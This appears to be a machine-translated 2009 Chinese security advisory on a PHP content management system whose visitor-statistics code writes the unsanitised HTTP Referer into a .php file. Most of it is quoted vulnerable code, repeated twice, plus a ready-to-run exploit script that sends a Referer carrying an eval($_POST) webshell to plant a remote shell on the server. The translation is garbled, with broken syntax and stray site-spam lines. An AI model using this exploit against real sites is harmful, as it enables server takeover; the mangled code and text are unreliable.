Electronic bucket music get shell vulnerability-vulnerability warning-the black bar safety net

2009-11-24T00:00:00
ID MYHACK58:62200925405
Type myhack58
Reporter 佚名
Modified 2009-11-24T00:00:00

Description

index.php line 1 0

$data_name=get_date();

... ...

$from=$_SERVER["HTTP_REFERER"];

... ...

if(file_exists("$sys_data_dir/stat/$data_name.php")) { $stat_data=file("$sys_data_dir/stat/$data_name.php"); for($a=0;$a<count($stat_data);$a++) { $stat_info=explode("|",$stat_data[$a]); if($stat_info[0]==$ip && $time_stamp-$stat_info[2]<$time_part)//if this IP has already accessed and the access time is less than access to record time, exit the loop { break; }

Weaving Dreams is good, good weaving dreams

if($stat_info[0]==$ip && $time_stamp-$stat_info[2]>$time_part)//if this IP has access to but the access time is greater than access to record time, write operation { $tod_data=readfrom("$sys_data_dir/stat/$data_name.php"); $new_data="$ip|$data_name/$now_time|$time_stamp|$earth_ip|$from|\n".$ tod_data; to write to("$sys_data_dir/stat/$data_name.php",$new_data); break; } $data_name=get_date(); ... ... $from=$_SERVER["HTTP_REFERER"]; ... ... if(file_exists("$sys_data_dir/stat/$data_name.php")) { $stat_data=file("$sys_data_dir/stat/$data_name.php"); for($a=0;$a<count($stat_data);$a++) { $stat_info=explode("|",$stat_data[$a]); if($stat_info[0]==$ip && $time_stamp-$stat_info[2] <$time_part)//if this IP has already accessed and the access time is less than access to record time, exit the loop { break; } if($stat_info[0]==$ip && $time_stamp-$stat_info[2]>$time_part)//if this IP has access to but the access time is greater than access to record time, to write to { $tod_data=readfrom("$sys_data_dir/stat/$data_name.php"); $new_data="$ip|$data_name/$now_time|$time_stamp|$earth_ip|$from|\n".$ tod_data; to write to("$sys_data_dir/stat/$data_name.php",$new_data); break; }------------------------------------------------------------------------------------

Woven dream content management system

Fake http_referer to write shell /data/stat/ 年 - 月 - 日 .php ------------------------------------------------------------------------------------ EXP: content comes from dedecms

<? $server = "; //host $host = "; //host $target = '/index.php'; //vul file $referer = '<? eval($_POST['CMD']);?& gt;'; // Referer $port = 8 0; $fp = fsockopen($server, $port, $errno, $errstr, 3 0); if (!$ fp) { echo "$errstr ($errno)<br />\n"; } else { $out = "GET $target HTTP/1.1\r\n"; $out .= "Host: $host\r\n"; $out .= "Cookie: ASPSESSIONIDSQTBQSDA=DFCAPKLBBFICDAFMHNKIGKEG\r\n"; $out .= "Referer: $referer\r\n"; dedecms.com $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); while (! feof($fp)) { echo fgets($fp, 1 2 8); } fclose($fp); } ?& gt;

This article comes from weaving dreams